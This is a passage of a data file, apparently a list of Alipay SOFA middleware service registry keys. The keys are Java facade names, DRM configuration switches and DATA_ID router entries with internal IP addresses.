FinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.InvestFeedbackServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.message.MailFileProcessorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTASSISTANT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.MarketingActivityConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.facade.recruit.ActivityEnrollInfoCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacube.ua.service.facade.unified.access.UnifiedAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-yuemamng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.das.biz.share.config.DasTenantPublishParamConfigManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.24.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:datakeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LendStatusCountDrm.queryLendStatusCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcrcportal:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffund.common.service.facade.api.autopilot.DefaultTransAccountInfoConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ifinfluxConf:name=com.alipay.fc.comparacenter.confscript.VersionControl.preloadStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceExecuteComplexFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRoleQueryFacade:1.0:merchantRoleQueryFacade-zm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.ampf.MobileAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.user.UserLoanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.shop.ShopBizOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_O_COUNTER_SYNC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.20.190.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fininsightcore.common.service.facade.decision.api.ConsultStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.shared.manager.drm.MbaasDRMImpl.mbaasCategoryList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkbcs.common.service.facade.rys.api.BcsRysAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.mng.QuotaDataManualManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.kernel.common.service.facade.QualityCheckFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.secucommunity.common.service.facade.alive.api.ALiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileacauth.service.hotchpotch.facade.AcauthDataFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbconfigcenter.common.service.facade.api.BizConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cashier.common.manage.cache.LocalCacheManageService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.follow.FollowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alphasecmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rctrack.OrderTrackMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.inst.InstitutionToolsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.137.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antlink.tuling.common.service.api.npr.NpRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.basic.DictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.EcoPageDetectTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.OpenIdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openitemcore.common.service.facade.api.property.PropertyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.service.RedPacketTokenService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:hb_product_order_auto_cancelled_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.dipper.DipperToolFeedBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.pointlibrary.api.PointBudgetLibConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessFlowAccessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.140.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openctrl.facade.FcRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.85.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.125.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.drmdemos:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databus.common.manage.facade.DatabusCoverageService:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.BizTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.contract.api.ContractInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.CustomerServiceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.merchant.listener.UniformEventHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.voucher.ShareVoucherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.multimediabase.facade.promotion.gift.GiftExchangeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.news.NewsDetailQueryV30Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openhome_commonAppAuditFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finslip_finreconSequenceDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.visitrecord.VisitRecordPurposeResultConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.common.service.storage.DataRepositoryService:1.0:zhubbatchalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.forum.api.ForumInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscene.common.service.facade.api.BrmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_M_FINANCE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antdac.profile.common.service.facade.tag.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.SyncRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.rpc.facade.innovate.GoodsCodeOperateRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cicprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.iot.tangula.facade.psyche.PsyCheRecallService:1.0:tangula@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.ads.facade.AdsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.changeriskmanage.common.service.facade.callback.ProcessCallback:1.0:rulescannerCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.bubble.BubbleContentProvider:1.0:selfMarketingBubbleContentProvider@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.graywall.platform.client.drm.GraywallDrm.graywallConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmonitor.common.service.facade.health.HealthDegreeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ProductPoolTempFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.AidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.incomestatistics.facade.api.IncomeStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditchannel.facade.task.service.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ANTPIM#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.common.service.facade.alipayauth.EntOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatabus.common.agent.service.ZdatabusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.SystemConfigFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.entrance.ShopManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.aboss.common.service.facade.AbossUserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.authcenter.common.service.oauth.facade.api.OAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.148.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.onestopmng.OstsVisitRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:transfercenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.prodtrans.senior.query.facade.ProdtransQueryExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.routeclient.interfacename:pcfrontquality#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rep.facade.RiskEventFacadeService:1.0:riskevent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.record.MidasRecordSwitchDRMControl.recordVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.2.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.spi.MessageSpi:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prediction.PredictionService:1.0:predictproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.SlsMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.ptcore.common.service.facade.api.product.ProductRelationQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.certifymng.revolmng.service.facade.VersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.CommonApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:broadcastIndicatorExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artvcroom.common.service.facade.ArtvcStatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.JiuzhouOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.ebppcoreChargeoffQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.security.sandbox.manager.facade.SandboxExperimentGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.katongprod.common.service.facade.management.KatongCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.service.facade.api.PlayTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.batchfund.common.service.facade.alloc.api.AllocRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_S_OPS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.134.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscene.batch.common.test.TaskTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.shared.preferential.SettlePayInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.ZpaasOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.core.DeployTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mmtcaftscmdproc.common.service.facade.OtaUpgradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ShopLayoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.NewsUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.publish.RulePublishServie:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.weiboSuspicionSpamThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundTaxDeferLicenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.137.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.181.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iregulation.common.service.facade.spi.TransactionInfoQuerySpi:1.0:igadaptor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthmanagertwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.clive.common.service.facade.api.CsccActionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.141.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcbmarketcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iglobalfundcontrol.common.config.api.FundProductCodeConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custdecision.service.questionnaire.QuestionnaireMetaInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.ArticleRelationTeaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.122.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-darwintwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.73.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.busriskdec.facade.riskcheck.services.PicCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.life.LifeMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_MCARD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.mosng.service.facade.ApiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.DecisionConfigQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdslib.common.integration.AntCaptchaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.allowance.facade.AllowanceDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertifyUnfreeStateResolverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.UrlContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sdaappdist.common.service.facade.bootwizard.BootWizardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cfpcenter.emc.common.service.facade.api.EmcBusinessTransFacade:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bk.compass.facade.api.CheckEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinbaseprod.biz.service.gw.antsearch.api.AntSearchTransform:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.199.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finsupport.common.service.facade.outflux.BatchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.jiebeipromo.service.PcreditMarketRankEstimateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.UserEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.core.cpmproduct.repository.FinpwmCpmElementRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cdp.common.service.facade.space.feedback.SpaceFeedbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.gui.HedgeStrategyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.31.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acmcscore.facade.MaintenanceStakeholderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.extension.BPNotificationHandler:1.0:ideploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.service.tenant.DataProjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.FileTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alipaymember.common.service.facade.exchange.service.BenefitExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBUserAgreementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.RepayBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.RuleEngineRerunSampleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:variable-apply-online@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.CipherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.xviewcore:name=com.alipay.xview.core.provider.drm.CacheProviderSwitch.cacheLogControlSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.236.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secretcore.endpoint.facade.SecretMngConsoleRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exriskcenter.common.service.facade.api.query.ExPredictPeriodTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcBillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcbumng_processCallback_antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accustomerweb.common.service.facade.AuthCodeManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbillcenter.facade.service.sync.BillSyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.common.service.facade.operation.ParamMangerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.operate.openapi.client.ConsumeOperationInvokeService:1.0:openEntranceShowService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_INSTANALYSIS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.oyz.core.service.SequenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:reservecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_cloudFunds_isvCollectionChannelEdit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.161.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.160.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_